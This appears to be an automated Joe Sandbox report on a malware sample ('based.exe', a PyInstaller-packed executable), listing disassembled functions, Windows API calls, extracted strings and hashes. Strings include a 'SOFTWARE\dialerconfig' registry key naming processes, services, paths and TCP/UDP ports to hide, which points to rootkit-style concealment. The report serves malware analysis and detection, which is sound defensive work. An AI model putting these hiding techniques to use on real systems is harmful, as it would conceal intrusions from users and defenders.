API String ID: 3976345311-1917537409
Opcode ID: 88945070a8cc5cba7bbb6804309b980ad8c397b15a896308c4a26de9748459e8
Instruction ID: 25180a2d309eff66018d37e1cc02d46cef73ac54b7a0bfb4d071c5bce6a72b36
Opcode Fuzzy Hash: 88945070a8cc5cba7bbb6804309b980ad8c397b15a896308c4a26de9748459e8
Instruction Fuzzy Hash: 3A41B337A287128AEB14DF21A4410BC37A5EF457D8B546A35EA5E83B85EF3EF4818300

Function 00007FF67D01D2F8 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNEL32 ref: 00007FF67D01D40F
GetLastError.KERNEL32 ref: 00007FF67D01D431

Strings

U, xrefs: 00007FF67D01D3BB

Memory Dump Source

Source File: 00000001.00000002.1796384921.00007FF67D001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF67D000000, based on PE: true

Associated: 00000001.00000002.1795174225.00007FF67D000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1798312776.00007FF67D02B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1799605949.00007FF67D03E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1799605949.00007FF67D040000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1802148668.00007FF67D042000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff67d000000_hacn.jbxd

Similarity

API ID: ErrorFileLastWrite
String ID: U
API String ID: 442123175-4171548499
Opcode ID: 58f62ff0c7f7b6be9e4ecb54e809448fa16189ed2b231f8d6d1ca058d2495b08
Instruction ID: 6d1ff4e4667c078b5a4de81472af3b5e4bd6e961215b57e607913b51d426d32c
Opcode Fuzzy Hash: 58f62ff0c7f7b6be9e4ecb54e809448fa16189ed2b231f8d6d1ca058d2495b08
Instruction Fuzzy Hash: 20419F33A29A5192EB20DF25E4443ADA760FB88794F845631EA4DC7798EF3DF441C750

Function 00007FF67D01FA18 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66COMMON

Download Yara Rule

APIs

GetCurrentDirectoryW.KERNEL32 ref: 00007FF67D01FA58
GetCurrentDirectoryW.KERNEL32 ref: 00007FF67D01FAAA

Strings

:, xrefs: 00007FF67D01FA6E

Memory Dump Source

Source File: 00000001.00000002.1796384921.00007FF67D001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF67D000000, based on PE: true

Associated: 00000001.00000002.1795174225.00007FF67D000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1798312776.00007FF67D02B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1799605949.00007FF67D03E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1799605949.00007FF67D040000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1802148668.00007FF67D042000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff67d000000_hacn.jbxd

Similarity

API ID: CurrentDirectory
String ID: :
API String ID: 1611563598-336475711
Opcode ID: 884843f61a913e511492ae59f2e8ac08e6ee45aa1f2a5b6daf929ec9177656e2
Instruction ID: 4bff40c85fba1f1518f1c093fe7f283a5e388adf2179f9e27b7fbcf2d62503b2
Opcode Fuzzy Hash: 884843f61a913e511492ae59f2e8ac08e6ee45aa1f2a5b6daf929ec9177656e2
Instruction Fuzzy Hash: 5B21F063A2868185EB209F11D0442AE77B1FBC8B88F855A35DB8D83684EF7DF949C740

Function 00007FF67D002B30 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 57windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF67D008BE0: MultiByteToWideChar.KERNEL32(?,?,?,?,?,00007FF67D002ABB), ref: 00007FF67D008C1A

MessageBoxW.USER32 ref: 00007FF67D002C05
MessageBoxA.USER32 ref: 00007FF67D002C21

Strings

Fatal error detected, xrefs: 00007FF67D002BDB, 00007FF67D002C13

Memory Dump Source

Source File: 00000001.00000002.1796384921.00007FF67D001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF67D000000, based on PE: true

Associated: 00000001.00000002.1795174225.00007FF67D000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1798312776.00007FF67D02B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1799605949.00007FF67D03E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1799605949.00007FF67D040000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1802148668.00007FF67D042000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff67d000000_hacn.jbxd

Similarity

API ID: Message$ByteCharMultiWide
String ID: Fatal error detected
API String ID: 1878133881-4025702859
Opcode ID: 851903317bfc7efaf1ad6cdea84b2df33a0253a3527f03e892242bbcad957f63
Instruction ID: 7304f998045794fb31537991a1b39241d214b086ff850f1afaa3735d1ca1f409
Opcode Fuzzy Hash: 851903317bfc7efaf1ad6cdea84b2df33a0253a3527f03e892242bbcad957f63
Instruction Fuzzy Hash: A8214673638A8191E720DF10E4516DA6764FF847C8F806635D68D87969EF3CF205C750

Function 00007FF67D002C50 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 57windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF67D008BE0: MultiByteToWideChar.KERNEL32(?,?,?,?,?,00007FF67D002ABB), ref: 00007FF67D008C1A

MessageBoxW.USER32 ref: 00007FF67D002D25
MessageBoxA.USER32 ref: 00007FF67D002D41

Strings

Error detected, xrefs: 00007FF67D002CFB, 00007FF67D002D33

Memory Dump Source

Source File: 00000001.00000002.1796384921.00007FF67D001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF67D000000, based on PE: true

Associated: 00000001.00000002.1795174225.00007FF67D000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1798312776.00007FF67D02B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1799605949.00007FF67D03E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1799605949.00007FF67D040000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1802148668.00007FF67D042000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff67d000000_hacn.jbxd

Similarity

API ID: Message$ByteCharMultiWide
String ID: Error detected
API String ID: 1878133881-3513342764
Opcode ID: 6f9a1586ca547a3c2f77bf815536a5540435ab6ab19a441e761cc5e7daea12c4
Instruction ID: 22e1ef7a1000dcbc1c3e79df1b2d3b376794b3a75384d3a1fa6687a5c3494275
Opcode Fuzzy Hash: 6f9a1586ca547a3c2f77bf815536a5540435ab6ab19a441e761cc5e7daea12c4
Instruction Fuzzy Hash: AE21587363868591E720DF10F4916DA6754FF847C8F806636D68D87969EF3CE205C750

Function 00007FF67D00FF80 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMON

Download Yara Rule

APIs

RtlPcToFileHeader.KERNEL32 ref: 00007FF67D00FFD0
RaiseException.KERNEL32 ref: 00007FF67D010011

Strings

csm, xrefs: 00007FF67D00FFFE

Memory Dump Source

Source File: 00000001.00000002.1796384921.00007FF67D001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF67D000000, based on PE: true

Associated: 00000001.00000002.1795174225.00007FF67D000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1798312776.00007FF67D02B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1799605949.00007FF67D03E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1799605949.00007FF67D040000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1802148668.00007FF67D042000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff67d000000_hacn.jbxd

Similarity

API ID: ExceptionFileHeaderRaise
String ID: csm
API String ID: 2573137834-1018135373
Opcode ID: 5da07f41cc1f2f0249302dc9aa2704e59a17d1d76e31cb25285a30e0af08f503
Instruction ID: 0479fa351775938b8c460b0ddc55f60a89ebef03ee137ca9292e8987a54b15e1
Opcode Fuzzy Hash: 5da07f41cc1f2f0249302dc9aa2704e59a17d1d76e31cb25285a30e0af08f503
Instruction Fuzzy Hash: F9112E33629B4192EB618F15E44026ABBE5FB88B88F585734EE8C47768EF3CE5518700

Function 00007FF67D02051C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 36COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF67D02054C
GetDriveTypeW.KERNEL32 ref: 00007FF67D02058C

Strings

:, xrefs: 00007FF67D020575

Memory Dump Source

Source File: 00000001.00000002.1796384921.00007FF67D001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF67D000000, based on PE: true

Associated: 00000001.00000002.1795174225.00007FF67D000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1798312776.00007FF67D02B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1799605949.00007FF67D03E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1799605949.00007FF67D040000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1802148668.00007FF67D042000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff67d000000_hacn.jbxd

Similarity

API ID: DriveType_invalid_parameter_noinfo
String ID: :
API String ID: 2595371189-336475711
Opcode ID: 0484c027a31e3174e61c97ce986110c8cc183ac5b324247cdaa72bb813f071bc
Instruction ID: bcc76d44def7eb2f80a37f679c7af4bf63caf58270fb0f776922b9cba40e22c2
Opcode Fuzzy Hash: 0484c027a31e3174e61c97ce986110c8cc183ac5b324247cdaa72bb813f071bc
Instruction Fuzzy Hash: 2B018F6393830286FB20EF64946127F6BA0FF48708F802A39D54DC6695FE3CF544CA14

Analysis Process: based.exePID: 6664, Parent PID: 6448COMMON

Execution Graph

Execution Coverage:	4.8%
Dynamic/Decrypted Code Coverage:	12.9%
Signature Coverage:	2.6%
Total number of Nodes:	1031
Total number of Limit Nodes:	55

Executed Functions

Function 00007FF727261000 Relevance: 40.6, APIs: 5, Strings: 18, Instructions: 338
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Could not create temporary directory!, xrefs: 00007FF727263838
Could not side-load PyInstaller's PKG archive from external file (%s), xrefs: 00007FF7272637EF
Failed to start splash screen!, xrefs: 00007FF727263933
Failed to convert DLL search path!, xrefs: 00007FF7272638A3
bye-runtime-tmpdir, xrefs: 00007FF7272635D3
pkg, xrefs: 00007FF7272637CF
pyi-disable-windowed-traceback, xrefs: 00007FF72726361D
WARNING: failed to remove temporary directory: %s, xrefs: 00007FF727263A31
MEI, xrefs: 00007FF72726374E
Failed to initialize security descriptor for temporary directory!, xrefs: 00007FF727263820
ERROR: failed to remove temporary directory: %s, xrefs: 00007FF727263A12
Path exceeds PYI_PATH_MAX limit., xrefs: 00007FF7272636FC
Failed to unpack splash screen dependencies from PKG archive!, xrefs: 00007FF727263905
Failed to load Tcl/Tk shared libraries for splash screen!, xrefs: 00007FF72726391A
Could not load PyInstaller's embedded PKG archive from the executable (%s), xrefs: 00007FF72726378C
PYINSTALLER_STRICT_UNPACK_MODE, xrefs: 00007FF727263653
pyi-contents-directory, xrefs: 00007FF7272635F8
_MEIPASS2, xrefs: 00007FF7272636A2, 00007FF7272636AE, 00007FF7272639AC

Memory Dump Source

Source File: 00000002.00000002.2421531478.00007FF727261000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF727260000, based on PE: true

Associated: 00000002.00000002.2421487487.00007FF727260000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.2421634004.00007FF72728B000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.2421682206.00007FF72729E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.2421682206.00007FF7272A4000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.2421804168.00007FF7272A6000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff727260000_based.jbxd

Similarity

API ID: FileModuleName
String ID: Could not create temporary directory!$Could not load PyInstaller's embedded PKG archive from the executable (%s)$Could not side-load PyInstaller's PKG archive from external file (%s)$ERROR: failed to remove temporary directory: %s$Failed to convert DLL search path!$Failed to initialize security descriptor for temporary directory!$Failed to load Tcl/Tk shared libraries for splash screen!$Failed to start splash screen!$Failed to unpack splash screen dependencies from PKG archive!$MEI$PYINSTALLER_STRICT_UNPACK_MODE$Path exceeds PYI_PATH_MAX limit.$WARNING: failed to remove temporary directory: %s$_MEIPASS2$bye-runtime-tmpdir$pkg$pyi-contents-directory$pyi-disable-windowed-traceback
API String ID: 514040917-1099759049
Opcode ID: e23a9ccd942307691fa2c6e5801df207f454df66072e745eadd11f0fb1882333
Instruction ID: 57501bc4588f215dc036185e0e2d329f5cfa2f16bbc345d8a02f640617d07cd6
Opcode Fuzzy Hash: e23a9ccd942307691fa2c6e5801df207f454df66072e745eadd11f0fb1882333
Instruction Fuzzy Hash: 14F16421A0868291FA15F720DF552F9A2F1EF56740FC4803BDA2D83697EF2CE556CB60

Function 000001F91B322B2C Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 264
stringlibraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleA.KERNEL32 ref: 000001F91B322BD0
lstrlenW.KERNEL32 ref: 000001F91B322E0A

Part of subcall function 000001F91B32199C: OpenProcess.KERNEL32 ref: 000001F91B3219C2
Part of subcall function 000001F91B32199C: K32GetModuleFileNameExW.KERNEL32 ref: 000001F91B3219E0
Part of subcall function 000001F91B32199C: PathFindFileNameW.SHLWAPI ref: 000001F91B3219EF
Part of subcall function 000001F91B32199C: lstrlenW.KERNEL32 ref: 000001F91B3219FB
Part of subcall function 000001F91B32199C: StrCpyW.SHLWAPI ref: 000001F91B321A0E
Part of subcall function 000001F91B32199C: CloseHandle.KERNEL32 ref: 000001F91B321A1C

GetProcAddress.KERNEL32 ref: 000001F91B322BE5

Part of subcall function 000001F91B32152C: StrCmpIW.SHLWAPI ref: 000001F91B32155D

Part of subcall function 000001F91B323844: StrCmpNIW.SHLWAPI ref: 000001F91B32385C

StrCmpNIW.SHLWAPI ref: 000001F91B322C28
lstrlenW.KERNEL32 ref: 000001F91B322D50

Strings

ntdll.dll, xrefs: 000001F91B322BC9
\Device\Nsi, xrefs: 000001F91B322C1B
NtQueryObject, xrefs: 000001F91B322BDB

Memory Dump Source

Source File: 00000002.00000002.2421007751.000001F91B320000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001F91B320000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1f91b320000_based.jbxd

Similarity

API ID: lstrlen$FileHandleModuleName$AddressCloseFindOpenPathProcProcess
String ID: NtQueryObject$\Device\Nsi$ntdll.dll
API String ID: 2119608203-3850299575
Opcode ID: 9c3d18d3d08cd52b53439cd9635d78b514e0dbb1c6aaf52094b9259375ebc022
Instruction ID: 955a688418e53f94d4125852c0591c49552a3d69651ab15b1429fc901e9338e5
Opcode Fuzzy Hash: 9c3d18d3d08cd52b53439cd9635d78b514e0dbb1c6aaf52094b9259375ebc022
Instruction Fuzzy Hash: EEB19B3621AA5386EB65AF29DC407FD63A6FB44BE4F085076EE0953794DB34CC66C340

Function 00007FF727285C74 Relevance: 13.8, APIs: 9, Instructions: 276
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF7272859A8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7272859E9
Part of subcall function 00007FF7272859A8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF727285A67
Part of subcall function 00007FF7272859A8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF727285AB8

CreateFileW.KERNELBASE ref: 00007FF727285D7A
CreateFileW.KERNEL32 ref: 00007FF727285DCA
GetLastError.KERNEL32 ref: 00007FF727285DFA
GetFileType.KERNELBASE ref: 00007FF727285E0F
GetLastError.KERNEL32 ref: 00007FF727285E19
CloseHandle.KERNEL32 ref: 00007FF727285E4C
CloseHandle.KERNEL32 ref: 00007FF727285FAF
CreateFileW.KERNEL32 ref: 00007FF727285FE4
GetLastError.KERNEL32 ref: 00007FF727285FF3

Memory Dump Source

Source File: 00000002.00000002.2421531478.00007FF727261000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF727260000, based on PE: true

Associated: 00000002.00000002.2421487487.00007FF727260000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.2421634004.00007FF72728B000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.2421682206.00007FF72729E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.2421682206.00007FF7272A4000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.2421804168.00007FF7272A6000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff727260000_based.jbxd

Similarity

API ID: File$CreateErrorLast_invalid_parameter_noinfo$CloseHandle$Type
String ID:
API String ID: 1617910340-0
Opcode ID: a69f399e4b06a5e248c6b703f60b2f721b94672e004abf856287656fc91ee5b6
Instruction ID: 14ba95b0fa468a596a0f02fba26591d8586861d9f7a678e6bfe00459f21ac5ea
Opcode Fuzzy Hash: a69f399e4b06a5e248c6b703f60b2f721b94672e004abf856287656fc91ee5b6
Instruction Fuzzy Hash: DBC1F732B14A4185EB10DF69C9806AC77B6FB4AB98F411235DF2E9B795CF39D052C720

Function 00007FF7272679B0 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 89
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FindFirstFileW.KERNELBASE(?,00007FF727267EF9,00007FF7272639E6), ref: 00007FF727267A1B
RemoveDirectoryW.KERNEL32(?,00007FF727267EF9,00007FF7272639E6), ref: 00007FF727267A9E
DeleteFileW.KERNELBASE(?,00007FF727267EF9,00007FF7272639E6), ref: 00007FF727267ABD
FindNextFileW.KERNEL32(?,00007FF727267EF9,00007FF7272639E6), ref: 00007FF727267ACB
FindClose.KERNEL32(?,00007FF727267EF9,00007FF7272639E6), ref: 00007FF727267ADC
RemoveDirectoryW.KERNELBASE(?,00007FF727267EF9,00007FF7272639E6), ref: 00007FF727267AE5

Strings

%s\*, xrefs: 00007FF7272679E2

Memory Dump Source

Source File: 00000002.00000002.2421531478.00007FF727261000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF727260000, based on PE: true

Associated: 00000002.00000002.2421487487.00007FF727260000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.2421634004.00007FF72728B000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.2421682206.00007FF72729E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.2421682206.00007FF7272A4000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.2421804168.00007FF7272A6000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff727260000_based.jbxd

Similarity

API ID: FileFind$DirectoryRemove$CloseDeleteFirstNext
String ID: %s\*
API String ID: 1057558799-766152087
Opcode ID: 37c75c647de740c4d03e434983ba542f23ef98c0d39288f6f50529afbb256bed
Instruction ID: a933dec0a08577a67d3d385325421bf26ae5501818e81c298f1d1cc86e907b02
Opcode Fuzzy Hash: 37c75c647de740c4d03e434983ba542f23ef98c0d39288f6f50529afbb256bed
Instruction Fuzzy Hash: 34417F21A0C54391EA20AF24EA445B9B3F1FB96754FC0823BD59D82794DF2CDA4B8F20

Function 000001F91B32253C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 185COMMON

Download Yara Rule

APIs

GetFileType.KERNEL32 ref: 000001F91B322620
StrCpyW.SHLWAPI ref: 000001F91B322639

Strings

\\.\pipe\, xrefs: 000001F91B32262B

Memory Dump Source

Source File: 00000002.00000002.2421007751.000001F91B320000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001F91B320000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1f91b320000_based.jbxd

Similarity

API ID: FileType
String ID: \\.\pipe\
API String ID: 3081899298-91387939
Opcode ID: 54f1dfa0457f4d2b58266312e3bc9b9bd619b52cd53b64f893b189ad2eed13fb
Instruction ID: 612a08ef5e2e3ed63eabed1de08bed0ffc2fbbfe99e110f63716034b99f27894
Opcode Fuzzy Hash: 54f1dfa0457f4d2b58266312e3bc9b9bd619b52cd53b64f893b189ad2eed13fb
Instruction Fuzzy Hash: E271C23A60D78345E724AE2A9C443FE6796F385BE4F480076DE0A53B8ADB35C6568B00

Function 00007FF7272685A0 Relevance: 3.0, APIs: 2, Instructions: 29COMMON

Download Yara Rule

APIs

FindFirstFileExW.KERNELBASE ref: 00007FF7272685D3
FindClose.KERNELBASE ref: 00007FF7272685E2

Memory Dump Source

Source File: 00000002.00000002.2421531478.00007FF727261000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF727260000, based on PE: true

Associated: 00000002.00000002.2421487487.00007FF727260000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.2421634004.00007FF72728B000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.2421682206.00007FF72729E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.2421682206.00007FF7272A4000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.2421804168.00007FF7272A6000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff727260000_based.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID:
API String ID: 2295610775-0
Opcode ID: ca66ee6ee850f25a53d0c9653a43f1313d0231bc46844eb151e3c2d0b1a3e355
Instruction ID: 16e2f5ef20e6be11a7a24d371a06086d4cda91b64caaefc340c60fdcbc4507ca
Opcode Fuzzy Hash: ca66ee6ee850f25a53d0c9653a43f1313d0231bc46844eb151e3c2d0b1a3e355
Instruction Fuzzy Hash: BCF0C832A1868186F7A09B60BA49766B3E0EB45728F84533ED96D026D4DF3CD05A8F10

Function 00007FF72727FBD8 Relevance: 2.0, APIs: 1, Instructions: 461COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2421531478.00007FF727261000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF727260000, based on PE: true

Associated: 00000002.00000002.2421487487.00007FF727260000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.2421634004.00007FF72728B000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.2421682206.00007FF72729E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.2421682206.00007FF7272A4000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.2421804168.00007FF7272A6000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff727260000_based.jbxd

Similarity

API ID: CurrentFeaturePresentProcessProcessor
String ID:
API String ID: 1010374628-0
Opcode ID: 2b6c2d1e4c043c62936e9dac6caf21e199e31a345cf4845f2c7219b702089de4
Instruction ID: 8af0db26e203514cb354bbeadd7d5bb5467233f1b2fdc86fae2dd32006072f55
Opcode Fuzzy Hash: 2b6c2d1e4c043c62936e9dac6caf21e199e31a345cf4845f2c7219b702089de4
Instruction Fuzzy Hash: A202AA21A1D69341FA61FB159F01679A2E0EF47BA0FD44639DD6D8A2D2DF3DA4038B30

Function 000001F91B3228C8 Relevance: .1, Instructions: 64COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2421007751.000001F91B320000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001F91B320000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1f91b320000_based.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 35d1efe4857f8844a1db8c4c8ed7dc734db620b0767d36ab5b03d26aefcb1554
Instruction ID: b704aea69ed206028f508fc956f3ca6bb7186bf87d513bc83a78aeedea7779bd
Opcode Fuzzy Hash: 35d1efe4857f8844a1db8c4c8ed7dc734db620b0767d36ab5b03d26aefcb1554
Instruction Fuzzy Hash: 6721AC32319B478AE360AF16AC416AEB7A5F384FE0F594139DF9543758DF34D8628700

Function 000001F91B321628 Relevance: 50.9, APIs: 20, Strings: 9, Instructions: 157
registrymemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcessHeap.KERNEL32 ref: 000001F91B321633
HeapAlloc.KERNEL32 ref: 000001F91B321642

Part of subcall function 000001F91B321268: GetProcessHeap.KERNEL32 ref: 000001F91B32126E
Part of subcall function 000001F91B321268: HeapAlloc.KERNEL32 ref: 000001F91B32127D
Part of subcall function 000001F91B321268: GetProcessHeap.KERNEL32 ref: 000001F91B321297
Part of subcall function 000001F91B321268: HeapAlloc.KERNEL32 ref: 000001F91B3212A8

RegOpenKeyExW.ADVAPI32 ref: 000001F91B3216B2
RegOpenKeyExW.ADVAPI32 ref: 000001F91B3216DF
RegCloseKey.ADVAPI32 ref: 000001F91B3216F9
RegOpenKeyExW.ADVAPI32 ref: 000001F91B321719
RegCloseKey.ADVAPI32 ref: 000001F91B321734
RegOpenKeyExW.ADVAPI32 ref: 000001F91B321754
RegCloseKey.ADVAPI32 ref: 000001F91B32176F
RegOpenKeyExW.ADVAPI32 ref: 000001F91B32178F
RegCloseKey.ADVAPI32 ref: 000001F91B3217AA
RegOpenKeyExW.ADVAPI32 ref: 000001F91B3217CA
RegCloseKey.ADVAPI32 ref: 000001F91B3217E5
RegOpenKeyExW.ADVAPI32 ref: 000001F91B321805
RegCloseKey.ADVAPI32 ref: 000001F91B321820
RegOpenKeyExW.ADVAPI32 ref: 000001F91B321840
RegCloseKey.ADVAPI32 ref: 000001F91B32185B
RegOpenKeyExW.ADVAPI32 ref: 000001F91B32187B
RegCloseKey.ADVAPI32 ref: 000001F91B321896
RegCloseKey.ADVAPI32 ref: 000001F91B3218A0

Part of subcall function 000001F91B3212BC: RegQueryInfoKeyW.ADVAPI32 ref: 000001F91B321319
Part of subcall function 000001F91B3212BC: GetProcessHeap.KERNEL32 ref: 000001F91B321327
Part of subcall function 000001F91B3212BC: HeapAlloc.KERNEL32 ref: 000001F91B321338
Part of subcall function 000001F91B3212BC: RegEnumValueW.ADVAPI32 ref: 000001F91B321397
Part of subcall function 000001F91B3212BC: GetProcessHeap.KERNEL32 ref: 000001F91B3213DF
Part of subcall function 000001F91B3212BC: HeapAlloc.KERNEL32 ref: 000001F91B3213ED
Part of subcall function 000001F91B3212BC: GetProcessHeap.KERNEL32 ref: 000001F91B32140A
Part of subcall function 000001F91B3212BC: HeapFree.KERNEL32 ref: 000001F91B321418
Part of subcall function 000001F91B3212BC: lstrlenW.KERNEL32 ref: 000001F91B321421
Part of subcall function 000001F91B3212BC: GetProcessHeap.KERNEL32 ref: 000001F91B32142F
Part of subcall function 000001F91B3212BC: HeapAlloc.KERNEL32 ref: 000001F91B32143D

Strings

process_names, xrefs: 000001F91B32174D
pid, xrefs: 000001F91B321712
startup, xrefs: 000001F91B3216D5
udp, xrefs: 000001F91B321874
paths, xrefs: 000001F91B321788
tcp_remote, xrefs: 000001F91B321839
SOFTWARE\dialerconfig, xrefs: 000001F91B321692
tcp_local, xrefs: 000001F91B3217FE
service_names, xrefs: 000001F91B3217C3

Memory Dump Source

Source File: 00000002.00000002.2421007751.000001F91B320000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001F91B320000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1f91b320000_based.jbxd

Similarity

API ID: Heap$CloseOpen$Process$Alloc$EnumFreeInfoQueryValuelstrlen
String ID: SOFTWARE\dialerconfig$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
API String ID: 106492572-2879589442
Opcode ID: 29d8c56dd48d9a3b38e8b79419d4f3e68f34e96909367841420a970a2341c6d0
Instruction ID: 57ba427159f3f3f58038dd4d423a5810de92c434595bdc8d0d2dd0d4eed70e8c
Opcode Fuzzy Hash: 29d8c56dd48d9a3b38e8b79419d4f3e68f34e96909367841420a970a2341c6d0
Instruction Fuzzy Hash: F771113A71AE1385EB10AF66E9917ED2366F784BA8F081131ED4D47B68DF38C466C740

Function 00007FF7272618F0 Relevance: 22.9, APIs: 2, Strings: 11, Instructions: 172
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF7272676A0: _fread_nolock.LIBCMT ref: 00007FF72726774A

_fread_nolock.LIBCMT ref: 00007FF7272619B4

Part of subcall function 00007FF727262760: MessageBoxW.USER32 ref: 00007FF72726283B

Strings

Could not allocate memory for archive structure!, xrefs: 00007FF7272619EE
